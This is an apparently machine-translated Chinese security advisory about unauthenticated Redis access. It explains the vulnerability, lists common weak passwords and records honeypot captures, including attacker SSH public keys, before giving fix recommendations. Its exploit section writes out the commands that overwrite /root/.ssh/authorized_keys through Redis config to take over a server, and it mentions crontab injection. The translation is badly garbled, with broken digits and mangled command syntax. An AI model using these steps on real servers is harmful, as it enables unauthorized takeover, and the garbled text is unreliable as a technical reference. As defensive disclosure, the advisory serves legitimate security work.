Redis event a comprehensive analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201569262
Type myhack58
Reporter 佚名
Modified 2015-11-22T00:00:00


redis unauthorized access has not been valued, until the 1 1 on No. 4, and in this article on being broke: the redis you can write into the SSH Key and then control the server, the security personnel started a lot of attention to this event. 0×0 1 vulnerability profile Exposed in public of redis if you do not enable authentication services or the use of weak passwords a key pair, may be the attacker's malicious login, by writing SSH public key or write the crontab to execute the command mode and then control the server. 0×0 2 impact of the condition Baidu's Titan platform for the whole network the default port of the redis to detect, through the two days of data comparison, found that redis has not been party to the company valued. ! Wherein the weak password selection are as follows: Username root admin redis administrator webadmin sysadmin netadmin Password 1 2 3 4 5 6 1 2 3 4 5 1 2 3 4 5 6 7 8 9 password the ILOVEYOU redis root admin 1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 Domestic redis status: China is subject to the greatest harm of a country. The main data are as follows: ! Domestic redis unauthorized access to the main city distribution: ! 0×0 3 exploits Method one: By the Redis set method, to generate their own SSH public key file is written to user/. ssh directory, ssh-free certified login. $ ssh-keygen-t rsa//generate a public key$ (echo-e "\n\n"; cat id_rsa. pub; echo-e "\n\n") > foo.txt //Processing public key format written to the file $ redis-cli-h flushall //Sign in redis delete all databases and key ensure that the written data is not doped with other data, caution is available $ cat foo.txt | redis-cli-h set crackit and / / write data$ redis-cli-h 3 7 9> config set dir /root/. ssh/set the Save path 1 9 2. 1 6 8. 1. 1 1:6 3 7 9> config set dbfilename "authorized_keys"set database name 1 9 2. 1 6 8. 1. 1 1:6 3 7 9> Save to save the contents of the database to the/root/. ssh/authorized_keys save the authorized_keys will be covered before, cause the set before the free login failure. Method two: Write to the crontab in the execution. By Redis set1 ‘xxx’command so that the write data is always in the front,to ensure the implementation is successful, but the write data is large. crontab to execute the file format requirements are relatively loose. In centos where is written to/var/spool/cron directory. With reference to the method. 0×0 4 bug tracking In our own deployment of multiple honeypots, using redis monitor to monitor. redis-cli-h xx. xx. xx. monitor >ksdf. log And then the log to be monitored. Wherein a honeypot within 1 hour, capture a invasion command. ! from the Ukrainian compatriots greetings,this IP in our collection of proxy list hit,is likely just a springboard for the machine. His public key as follows ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAqc/Z+/g2nHKXaWxCJD1wpFRt8EuBi1ud2kIyouw+YN3JlAmslKAKCiHURwDs4n/gCwQZsw6cK3diLJj2yJ7IeWMaCNN5TeMhknapynv4fylrykbwoej+BW0Nlp1ntqAmE0rU+UslfroIjxMuzAJlGNbSe4oHiS6X2vdvYd6mymqptnhjphe58vqkjmic1qpqr67g6is+TX3IWrDLXVv6HQkLMqUVz+LU3m1/lCS/32xjBQwPzRf9ZY8sUb+aGMe0/ Other access to the public key as follows ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAqc74d4onj2ilupix6ocxjudanp1g6kra0zf89o0wrwumgkkcxwmj6jl2pgpmetcfhgfuout/bOmnAqpIQUGmsF5Ta9EOKJbwaoxzGMsvenvnf+baGUe7rdAHEfc/IGemsAm6InI8nKUP/Qarm9572ORwoPk/jNY6i5bQLPeuRIcE4wnazQf7PW0qxitTan2ejhdfbjrmibm6ebl0ghgjj3d1eddhkuc11/Iyx+SBo2RdSJM6w+3nIT6PWirlzgQCHcmY+0IaY1vfRpbyH14FEWIjEGNB68agpdO8YGtmSMPh6RxAghdIpbuOEqzrOf/ ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAqccuhevmrqy/Co/RJ5o5RTZmpl6sZ7U6w39WAvM7Scl7nGvr5ms4mrridaoazpw7spjmbhz2hwvapygcekcivk8xzc3p31v79fwelxxyxts0jfz8yzhymziugogckvris63dff1gfom/OHUyDHosi8E6BOi7ANqupScN8cIxDGsXmfr4ebqn4dofertklg5fhl9qgamaxxzreckwhmjfyuzgjgeaisydzr49x36jq6nufbm18ceze5zkxbbtubnbaomrb52tqx4rroqmuwve/Z0uCOBlbbG+9sKyY9wyp/aHLnRiyC8GBvbrZqQmyn9Yu1zBp3tY8Tt6DWmo6BLZV4/ Summary: Since Redis is a covered write, the more hackers or groups have been competing for the final write. When if you find yourself Redis is suddenly emptied, at No. 0 the default library implementation keys * command to display only "crackit" or other strange key,then“congratulations”you caught up. 0×0 5 fix recommendations 1. To Own the Redis added authentication, unless necessary, otherwise do not put itself exposed to the public network, do not with root enabled Redis. 2. iptables for own use fixed port on the white list. 3. View your own authorized_keys, as well as crontab tasks, if you include REDIS at the beginning, please reset. 4. Confirm yourself to be the hack of the machine, please check the chkrootkit and rootkit hunter check for rootkits.